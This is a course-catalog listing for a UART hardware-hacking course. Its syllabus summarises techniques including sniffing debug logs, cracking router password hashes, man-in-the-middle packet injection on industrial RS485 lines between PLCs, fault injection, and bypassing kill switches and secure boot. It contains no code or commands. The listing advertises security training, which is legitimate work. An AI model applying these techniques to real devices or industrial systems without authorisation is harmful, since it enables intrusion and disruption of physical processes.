Class Central is learner-supported. When you buy through links on our site, we may earn an affiliate commission.

TrainSec

UART Hacking course

via TrainSec

Go to class Write review

Overview

From pin identification and log capture, through OT protocols (RS232/422/485) analysis and firmware extraction, to hands on tool buildup labs (true MITM tool development) and practical techniques for bypassing secure boot and developing UART exploits.

Syllabus

  • Class 01 - Why Hack UART?
    • This class explains why UART is one of the most valuable entry points in hardware hacking. Students learn that UART, as a universal asynchronous receiver-transmitter, is embedded in almost every device to provide debugging and development support. The instructor highlights how engineers often leave UART ports active and unprotected, unintentionally creating backdoors. By tapping into UART, attackers can retrieve logs, interact with bootloaders, or even gain administrative shells. The lesson also connects UART to its industrial counterparts (RS232, RS422, RS485), showing how the same concept spans from consumer electronics to critical infrastructure. By the end of the class, students see UART not just as a protocol but as a direct, low-level attack vector. This sets the stage for the rest of the module, which progressively builds from identifying pins to performing advanced exploitation.
  • Class 02 – Identifying UART Pins
    • This session provides the practical skill of identifying UART pins on unknown devices. Because manufacturers rarely label these pins, students must apply systematic techniques to locate RX, TX, and GND. The instructor demonstrates using a multimeter to find ground, measuring idle voltages to spot transmit lines, and validating signals with oscilloscope or USB-to-UART converters. Common pitfalls, such as mistaking power lines for data pins, are discussed in detail to avoid hardware damage. This class connects to the module by ensuring students can reliably establish a physical UART connection, which is a prerequisite for all later exploitation techniques. Without proper pin identification, UART attacks cannot proceed.
  • Class 03 – Sniffing Log
    • In this class, students learn to capture debug logs and system messages broadcast over UART. Many devices output boot sequences, error logs, or kernel diagnostics through UART even when user interaction is blocked. By passively connecting to the TX line, students can collect valuable intelligence about firmware versions, hardware components, and potential weak points. This reconnaissance step is crucial before any attempt at active exploitation. The instructor demonstrates how logs reveal device configurations, sometimes including credentials or debug flags left by engineers. This class ties into the module by establishing how UART serves not only as an interactive shell but also as a transparent window into system internals.
  • Class 04 – Bypassing Simple Login
    • In this class, students learn how UART shell access can be turned into a direct bypass of the router’s administrative login screen. By navigating the file system exposed through UART, the instructor demonstrates how to identify user entries, and extract the stored password hashes. Students then see how to analyze the hash format and apply brute force or dictionary attacks to reverse the credentials. This exercise highlights how engineers often rely on a GUI login for protection while leaving the true keys to the system exposed in plain sight through UART.
  • Class 05 – UART and the OT World
    • This class marks the transition point from consumer hardware exploitation into the industrial OT domain. The instructor explains how UART is embedded not only in small devices but also in PLCs, controllers, and other industrial systems, often forming the backbone of RS232, RS422, and RS485 communication. Students learn how UART access on OT devices can expose process logic, control flows, and critical system logs, with the potential to impact production lines and safety mechanisms.
  • Class 06 – Connecting to OT Communication Lines
    • Students now practice connecting to live OT communication lines safely. Unlike small devices, OT setups often involve RS485/422 buses with multiple clients. The instructor demonstrates how to tap into these lines without causing signal disruption or system crashes. Emphasis is placed on non-invasive tapping, using proper adaptors, and avoiding collisions when inserting sniffers. The class strengthens the module by giving students the confidence to handle real-world OT wiring while preventing operational downtime or damage.
  • Class 07 – Identifying the Right Wires
    • OT environments often contain dense cable harnesses carrying power, sensors, and communication signals. This class teaches students how to differentiate between these wire types and locate the correct communication lines. Using systematic probing and measurement, students avoid dangerous mistakes such as connecting to power instead of data lines. This class connects to the full module by preparing students for field scenarios, where correct identification of communication lines is essential before any sniffing or exploitation attempt.
  • Class 08 – From OT to UART
    • This class explains how OT protocols like RS485 and RS422 are built on UART concepts. Students learn how these differential signaling systems can be bridged back into UART, enabling attackers to exploit them with the same tools used on embedded devices. The instructor demonstrates how RS485/422 wiring maps to RX/TX-level UART, making exploitation possible once the correct adaptors are used. This bridges OT communication to the rest of the module, showing how UART-level exploitation applies universally.
  • Class 09 - Sniffing OT Network • 43 mins
  • Class 10 – Reversing OT Traffic
    • This session focuses on reverse engineering OT traffic. Students learn to decode captured packet formats, recognize timing intervals, and map client-server interactions. The instructor demonstrates how UART-level sniffing reveals the logic of industrial processes, preparing students for active injection and manipulation. This class ties into the module as the transition from reconnaissance to exploitation.
  • Class 11 – True MITM on OT
    • Students escalate into full man-in-the-middle attacks on OT networks. The instructor demonstrates designing a device with relays and MAX485 modules that intercepts all traffic between PLCs and clients. Unlike simple sniffers, this device can modify, inject, or block packets in real time. Emphasis is placed on timing challenges, avoiding collisions, and synchronizing injection with GPIO controls. This class connects to the module by moving students from passive observers to active manipulators of OT processes.
  • Class 12 - Fault Injection in UART Attacks • 43 mins
  • Class 13 – Bypassing Kill Switch Protection
    • This class explores defeating advanced hardware protections, such as kill switches that disable devices upon tampering. Students learn how to identify these mechanisms and bypass them using UART, MITM, and glitching techniques. The instructor demonstrates real-world scenarios where kill switches were overcome to maintain system access. This class ties together all prior lessons—pin identification, sniffing, reversing, MITM, and fault injection—into a comprehensive exploitation strategy.
  • Class 14 – Bypassing secure boot
    • In this advanced class, students examine secure boot as both a defensive measure and an exploitable weakness. The instructor first explains the purpose and flow of secure boot, showing how cryptographic checks are meant to prevent unauthorized code execution. From there, the weaknesses of real implementations are exposed. Students learn three practical bypass strategies: inducing faults to disrupt validation, forcing single-user mode to escalate privileges, and manipulating firmware images directly to subvert checks. This class makes clear that secure boot, while marketed as bulletproof, is often vulnerable to precise hardware-level intervention.
  • Class 15 – Firmware extraction - the UART way
    • This class teaches how to extract complete firmware images from devices once UART access has been gained. The instructor first demonstrates leveraging built-in MCU bootloaders, showing how vendors like STMicroelectronics, NXP, TI, Espressif, and others expose UART-based programming interfaces that can be repurposed for firmware dumping. The second technique uses captured UART logs: a firmware hexdump streamed to the terminal can be reconstructed into a binary file using a simple Python script. By the end, students will know how attackers recover entire firmware images for offline reverse engineering, analysis, and implant development.

Taught by

Amichai Yifrach

Reviews

Start your review of UART Hacking course

Go to class

Never Stop Learning.

Get personalized course recommendations, track subjects and courses with reminders, and more.

Sign up for free
Someone learning on their laptop while sitting on the floor.